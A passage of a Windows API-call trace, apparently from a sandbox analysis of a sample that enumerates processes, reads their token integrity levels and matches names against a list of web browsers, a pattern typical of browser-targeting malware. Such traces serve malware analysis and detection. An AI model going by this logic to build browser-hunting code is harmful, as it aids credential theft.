lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0226.866] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0226.866] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0226.866] GetLastError () returned 0x7a [0226.866] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0226.866] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0226.866] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0226.866] CloseHandle (hObject=0x340) returned 1 [0226.867] CloseHandle (hObject=0x548) returned 1 [0226.867] lstrcmpiW (lpString1="firefox.exe", lpString2="laden.exe") returned -1 [0226.867] lstrcmpiW (lpString1="chrome.exe", lpString2="laden.exe") returned -1 [0226.867] lstrcmpiW (lpString1="opera.exe", lpString2="laden.exe") returned 1 [0226.867] lstrcmpiW (lpString1="iexplore.exe", lpString2="laden.exe") returned -1 [0226.867] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="laden.exe") returned 1 [0226.867] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="laden.exe") returned 1 [0226.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0x548 [0226.867] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0226.867] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0226.867] GetLastError () returned 0x7a [0226.867] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0226.867] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0226.867] CloseHandle (hObject=0x340) returned 1 [0226.867] CloseHandle (hObject=0x548) returned 1 [0226.867] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0226.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0x548 [0226.867] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x347688, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0226.867] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0226.867] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0226.867] GetLastError () returned 0x7a [0226.867] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0226.867] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0226.867] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0226.867] CloseHandle (hObject=0x340) returned 1 [0226.867] CloseHandle (hObject=0x548) returned 1 [0226.867] lstrcmpiW (lpString1="firefox.exe", lpString2="lying-yourself.exe") returned -1 [0226.867] lstrcmpiW (lpString1="chrome.exe", lpString2="lying-yourself.exe") returned -1 [0226.867] lstrcmpiW (lpString1="opera.exe", lpString2="lying-yourself.exe") returned 1 [0226.867] lstrcmpiW (lpString1="iexplore.exe", lpString2="lying-yourself.exe") returned -1 [0226.867] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="lying-yourself.exe") returned 1 [0226.867] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="lying-yourself.exe") returned 1 [0226.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0x548 [0226.867] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0226.867] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0226.867] GetLastError () returned 0x7a [0226.867] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0226.867] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0226.867] CloseHandle (hObject=0x340) returned 1 [0226.868] CloseHandle (hObject=0x548) returned 1 [0226.868] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0226.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0x548 [0226.868] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x347798, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0226.868] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0226.868] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0226.868] GetLastError () returned 0x7a [0226.868] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0226.868] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0226.868] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0226.868] CloseHandle (hObject=0x340) returned 1 [0226.868] CloseHandle (hObject=0x548) returned 1 [0226.868] lstrcmpiW (lpString1="firefox.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0226.868] lstrcmpiW (lpString1="chrome.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned -1 [0226.868] lstrcmpiW (lpString1="opera.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0226.868] lstrcmpiW (lpString1="iexplore.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0226.868] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0226.868] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0226.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0x548 [0226.868] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0226.868] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0226.868] GetLastError () returned 0x7a [0226.868] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0226.868] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0226.868] CloseHandle (hObject=0x340) returned 1 [0226.868] CloseHandle (hObject=0x548) returned 1 [0226.868] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0226.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0x548 [0226.868] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x3478b8, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0226.868] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0226.868] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0226.868] GetLastError () returned 0x7a [0226.868] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0226.868] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0226.868] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0226.868] CloseHandle (hObject=0x340) returned 1 [0226.868] CloseHandle (hObject=0x548) returned 1 [0226.868] lstrcmpiW (lpString1="firefox.exe", lpString2="colleague wrap.exe") returned 1 [0226.869] lstrcmpiW (lpString1="chrome.exe", lpString2="colleague wrap.exe") returned -1 [0226.869] lstrcmpiW (lpString1="opera.exe", lpString2="colleague wrap.exe") returned 1 [0226.869] lstrcmpiW (lpString1="iexplore.exe", lpString2="colleague wrap.exe") returned 1 [0226.869] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="colleague wrap.exe") returned 1 [0226.869] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="colleague wrap.exe") returned 1 [0226.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0x548 [0226.869] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0226.869] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0226.869] GetLastError () returned 0x7a [0226.869] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0226.869] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0226.869] CloseHandle (hObject=0x340) returned 1 [0226.869] CloseHandle (hObject=0x548) returned 1 [0226.869] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0226.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0x548 [0226.869] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x3479f0, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0226.869] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0226.869] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0226.869] GetLastError () returned 0x7a [0226.869] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0226.869] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0226.869] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0226.869] CloseHandle (hObject=0x340) returned 1 [0226.869] CloseHandle (hObject=0x548) returned 1 [0226.869] lstrcmpiW (lpString1="firefox.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0226.869] lstrcmpiW (lpString1="chrome.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0226.869] lstrcmpiW (lpString1="opera.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0226.869] lstrcmpiW (lpString1="iexplore.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0226.869] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0226.869] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0226.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0x548 [0226.869] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0226.869] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0226.869] GetLastError () returned 0x7a [0226.869] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0226.869] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0226.869] CloseHandle (hObject=0x340) returned 1 [0226.869] CloseHandle (hObject=0x548) returned 1 [0226.869] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0226.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0x548 [0226.870] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x347b10, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0226.870] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0226.870] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0226.870] GetLastError () returned 0x7a [0226.870] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0226.870] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0226.870] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0226.870] CloseHandle (hObject=0x340) returned 1 [0226.870] CloseHandle (hObject=0x548) returned 1 [0226.870] lstrcmpiW (lpString1="firefox.exe", lpString2="saturday.exe") returned -1 [0226.870] lstrcmpiW (lpString1="chrome.exe", lpString2="saturday.exe") returned -1 [0226.870] lstrcmpiW (lpString1="opera.exe", lpString2="saturday.exe") returned -1 [0226.870] lstrcmpiW (lpString1="iexplore.exe", lpString2="saturday.exe") returned -1 [0226.870] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="saturday.exe") returned -1 [0226.870] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="saturday.exe") returned -1 [0226.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0x548 [0226.870] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0226.870] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0226.870] GetLastError () returned 0x7a [0226.870] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0226.870] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0226.870] CloseHandle (hObject=0x340) returned 1 [0226.870] CloseHandle (hObject=0x548) returned 1 [0226.870] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0226.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0x548 [0226.870] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x347c50, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0226.870] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0226.870] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0226.870] GetLastError () returned 0x7a [0226.870] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0226.870] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0226.870] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0226.870] CloseHandle (hObject=0x340) returned 1 [0226.870] CloseHandle (hObject=0x548) returned 1 [0226.870] lstrcmpiW (lpString1="firefox.exe", lpString2="WINWORD.EXE") returned -1 [0226.870] lstrcmpiW (lpString1="chrome.exe", lpString2="WINWORD.EXE") returned -1 [0226.870] lstrcmpiW (lpString1="opera.exe", lpString2="WINWORD.EXE") returned -1 [0226.870] lstrcmpiW (lpString1="iexplore.exe", lpString2="WINWORD.EXE") returned -1 [0226.870] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="WINWORD.EXE") returned -1 [0226.871] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="WINWORD.EXE") returned -1 [0226.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a0) returned 0x0 [0226.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9e0) returned 0x0 [0226.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbe8) returned 0x0 [0226.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6cc) returned 0x0 [0226.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0226.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5fc) returned 0x548 [0226.871] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0226.871] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0226.871] GetLastError () returned 0x7a [0226.871] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0226.871] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0226.871] CloseHandle (hObject=0x340) returned 1 [0226.871] CloseHandle (hObject=0x548) returned 1 [0226.871] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0226.871] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5fc) returned 0x548 [0226.871] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x3481e8, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0226.871] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0226.871] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0226.871] GetLastError () returned 0x7a [0226.871] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0226.871] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0226.871] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, 